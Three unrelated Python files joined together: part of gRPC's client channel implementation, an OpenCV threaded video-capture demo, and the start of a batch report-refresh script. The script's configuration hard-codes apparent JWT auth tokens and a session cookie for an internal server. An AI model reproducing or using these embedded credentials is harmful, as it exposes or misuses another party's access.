state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
callback()
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
if cygrpc.is_fork_support_enabled():
condition_wait_timeout = 1.0
else:
condition_wait_timeout = None
def consume_request_iterator(): # pylint: disable=too-many-branches
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
while True:
state.condition.wait(condition_wait_timeout)
cygrpc.block_if_fork_in_progress(state)
if state.code is None:
if cygrpc.OperationType.send_message not in state.due:
break
else:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call): # pylint: disable=too-many-ancestors
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def cancel(self):
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return False
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
while True:
self._state.condition.wait()
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
while self._state.initial_metadata is None:
self._state.condition.wait()
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
while self._state.trailing_metadata is None:
self._state.condition.wait()
return self._state.trailing_metadata
def code(self):
with self._state.condition:
while self._state.code is None:
self._state.condition.wait()
return self._state.code
def details(self):
with self._state.condition:
while self._state.details is None:
self._state.condition.wait()
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
while self._state.debug_error_string is None:
self._state.condition.wait()
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
rendezvous = _Rendezvous(state, None, None, deadline)
return deadline, None, rendezvous
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _Rendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _Rendezvous(state, None, None, deadline)
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
return (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata,
initial_metadata_flags):
return tuple((
operations,
None,
)
for operations in _stream_unary_invocation_operationses(
metadata, initial_metadata_flags))
def _determine_deadline(user_deadline):
parent_deadline = cygrpc.get_deadline_from_context()
if parent_deadline is None and user_deadline is None:
return None
elif parent_deadline is not None and user_deadline is None:
return parent_deadline
elif user_deadline is not None and parent_deadline is None:
return user_deadline
else:
return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
compression):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else credentials._credentials, ((
operations,
None,
),), self._context)
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
(operations,), event_handler, self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__( # pylint: disable=too-many-locals
self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
augmented_metadata = _compression.augment_metadata(
metadata, compression)
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else
credentials._credentials, operationses,
_event_handler(state,
self._response_deserializer), self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _blocking(self, request_iterator, timeout, metadata, credentials,
wait_for_ready, compression):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(
augmented_metadata, initial_metadata_flags), self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(
metadata, initial_metadata_flags), event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials, operationses,
event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
"""Stores immutable initial metadata flags"""
def __new__(cls, value=_EMPTY_FLAGS):
value &= cygrpc.InitialMetadataFlags.used_mask
return super(_InitialMetadataFlags, cls).__new__(cls, value)
def with_wait_for_ready(self, wait_for_ready):
if wait_for_ready is not None:
if wait_for_ready:
return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
elif not wait_for_ready:
return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
return self
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler, context):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
context: Context object for distributed tracing.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags, context)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
try:
callback(connectivity)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(
target=_deliver, args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
callbacks = tuple(callback
for callback, unused_but_known_to_be_none_connectivity
in state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
compression_option = _compression.create_channel_option(compression)
return tuple(base_options) + compression_option + ((
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),)
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials, compression):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel.
"""
self._channel = cygrpc.Channel(
_common.encode(target), _augment_options(options, compression),
credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _unsubscribe_all(self):
state = self._connectivity_state
if state:
with state.lock:
del state.callbacks_and_connectivities[:]
def _close(self):
self._unsubscribe_all()
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
cygrpc.fork_unregister_channel(self)
def _close_on_fork(self):
self._unsubscribe_all()
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
        # has passed for all users to be trusted to hang on to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
try:
self._unsubscribe_all()
except: # pylint: disable=bare-except
# Exceptions in __del__ are ignored by Python anyway, but they can
# keep spamming logs. Just silence them.
pass
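# --- Illustrative usage sketch (not part of grpc itself) ---
# The multicallables above are normally reached through the public grpc API.
# The target address, method path, and identity serializers below are
# hypothetical placeholders; real stubs supply protobuf (de)serializers.
def _example_unary_unary_usage():
    channel = grpc.insecure_channel('localhost:50051')
    multicallable = channel.unary_unary(
        '/example.Echo/Call',               # hypothetical fully-qualified method
        request_serializer=lambda b: b,     # identity: the request is already bytes
        response_deserializer=lambda b: b)
    # The blocking form returns the response directly; .future() would instead
    # return a _Rendezvous that can be polled, cancelled, or queried for metadata.
    return multicallable(b'ping', timeout=5.0)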
|
demo_oop.py
|
# Object-oriented programming + a single thread.
# A single user-created thread: the basic building block for a multithreaded system.
# One thread acquires images from the camera while the main thread shows them.
# See demo_multithread.py for a more complete version.
# Multithreading demo reference:
# https://nrsyed.com/2018/07/05/multithreading-with-opencv-python-to-improve-video-processing-performance/
import numpy as np
from threading import Thread
import cv2
from datetime import datetime
class VideoGet:
"""
Class that continuously gets frames from a VideoCapture object
with a dedicated thread.
"""
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
Thread(target=self.get, args=()).start()
return self
def get(self):
while not self.stopped:
if not self.grabbed:
self.stop()
else:
(self.grabbed, self.frame) = self.stream.read()
                print(self.stream.get(cv2.CAP_PROP_FPS))  # reported capture FPS, printed once per grabbed frame
def stop(self):
self.stopped = True
def threadVideoGet(source=0):
"""
Dedicated thread for grabbing video frames with VideoGet object.
Main thread shows video frames.
"""
video_getter = VideoGet(source).start()
while True:
if (cv2.waitKey(1) == ord("q")) or video_getter.stopped:
video_getter.stop()
break
frame = video_getter.frame
cv2.imshow("Video", frame)
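# Hedged variant (a sketch, not in the original demo): threadVideoGet() above
# never releases the capture device or closes the window; a cleaner shutdown
# using the same VideoGet class could look like this.
def threadVideoGetClean(source=0):
    video_getter = VideoGet(source).start()
    try:
        while not video_getter.stopped:
            if cv2.waitKey(1) == ord("q"):
                break
            cv2.imshow("Video", video_getter.frame)
    finally:
        video_getter.stop()            # signal the grab thread to exit
        video_getter.stream.release()  # free the camera handle
        cv2.destroyAllWindows()        # close the display window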
if __name__ == '__main__':
threadVideoGet()
|
batchrefresh.py
|
# -*- coding: utf-8 -*-
import decorator
import sys
import os
import queue
import logging
import copy
import threading
import fileexport
import publish
import httpinvoke
from majorcollege2dict import majorcollege2dict
import util
"""Main module."""
logger=util.create_logger(logging.INFO,__name__)
back_logger=util.create_logger(logging.INFO,'back_logger')
college_report_config={
    # each subdirectory under this path is named after a college
'source-base-path': r'E:\newjincin\projects\ros\doc\18届数据\分院系',
'exportconfig':{
"exportlist": [
{
'from': r'e:\newjincin\projects\ros\doc\16届数据\分院系\{}\主数据源.xlsx',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\16届数据\分院系',
'type': 'file'
},
{
'from': r'E:\newjincin\projects\ros\doc\17届数据\分院系\{}\主数据源.xlsx',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\17届数据\分院系',
'type': 'file'
},
{
'from': r'E:\newjincin\projects\ros\doc\18届数据\分院系\{}',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\18届数据\分院系',
'type': 'directory'
}
],
},
'college_alias':{"传媒学院": ['凤凰传媒学院'],
"轨道交通学院":['城市轨道交通学院']
    },  # colleges that were renamed
'prep_cli_path':r'"D:\Program Files\Tableau\TableauPrepBuilder2019\scripts\tableau-prep-cli.bat" -c "{}" -t "{}"',
'tfl_path':r'e:\newjincin\projects\ros\doc\refresh\tfl\学院\学院.tfl',
'flow_path':r'e:\newjincin\projects\ros\doc\refresh\tfl\学院\flow.json',
'http_config':{
'generate_url':'http://10.10.3.225:19700/v1/planProcessInfo/generatePlanWord',
        # planId (plan id) is required; the report name is college name + report + yyyy-MM-dd
'generate_param':{"planId":"27","generateName":""},
'searchstatus_url':'http://10.10.3.225:19700/v1/planProcessInfo/getByUser/{}',
'download_url':'http://10.10.3.225:19700/v1/planProcessInfo/downloadPlanWord',
'download_param':{"planProcessInfoId":"{}"},
'download_filename':r'e:\newjincin\projects\ros\doc\refresh\output\分学院\{}.docx',
'cookies':{
'Admin-Token':'eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyb3MtbWFqb3IiLCJ1c2VySWQiOiI2ODI5MDMiLCJuYW1lIjoiUk9T5pON5L2c5Lq65ZGYIiwicm9sZXMiOlt7ImlkIjoyOSwiY29kZSI6bnVsbCwibmFtZSI6IlJPUyIsInN0YXR1cyI6bnVsbCwiY29sbGVnZUxpc3QiOm51bGwsIm1hbmFnZVNjb3BlTGlzdCI6bnVsbH1dLCJyb2xlVHlwZSI6IjAiLCJleHAiOjE1NTgwNzY2Mjh9.zY9gZZLuLTgUwIMmytMzTXDY79yhUc5xw6miNLRly9K19Haelw9ilpgwg24J6VY93j4fyIGmrmwKfr_UMI7tg9tMQwUlfrDhaKwQA6ll8lOgCafdEDrSe-h_rACT4j0kfaazxI3wl5w8HK3ka9MBtvPstkSa2hsTSDNkTaNFLMg',
'JSESSIONID':'F420351B4AD953795A66AC498B0FF18E',
'token':'eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyb3MtbWFqb3IiLCJ1c2VySWQiOiI2ODI5MDMiLCJuYW1lIjoiUk9T5pON5L2c5Lq65ZGYIiwicm9sZXMiOlt7ImlkIjoyOSwiY29kZSI6bnVsbCwibmFtZSI6IlJPUyIsInN0YXR1cyI6bnVsbCwiY29sbGVnZUxpc3QiOm51bGwsIm1hbmFnZVNjb3BlTGlzdCI6bnVsbH1dLCJyb2xlVHlwZSI6IjAiLCJleHAiOjE1NTgwNzY2Mjh9.zY9gZZLuLTgUwIMmytMzTXDY79yhUc5xw6miNLRly9K19Haelw9ilpgwg24J6VY93j4fyIGmrmwKfr_UMI7tg9tMQwUlfrDhaKwQA6ll8lOgCafdEDrSe-h_rACT4j0kfaazxI3wl5w8HK3ka9MBtvPstkSa2hsTSDNkTaNFLMg',
}
},
    # Output report config: planId is the plan to use, reportname is the report name template, {} is filled with the college name
'output_report_config':[
{
'planId':'48','reportname':'{}2018届本科毕业生社会需求与人才培养质量报告'
},
{
'planId':'51','reportname':'{}2016-2018届本科毕业生调研结果对比分析'
}
]
}
major_report_config={
    # each subdirectory under this path is named after a major
'source-base-path': r'E:\newjincin\projects\ros\doc\18届数据\分专业',
'exportconfig':{
"exportlist": [
{
'from': r'e:\newjincin\projects\ros\doc\16届数据\分专业\{}\主数据源.xlsx',
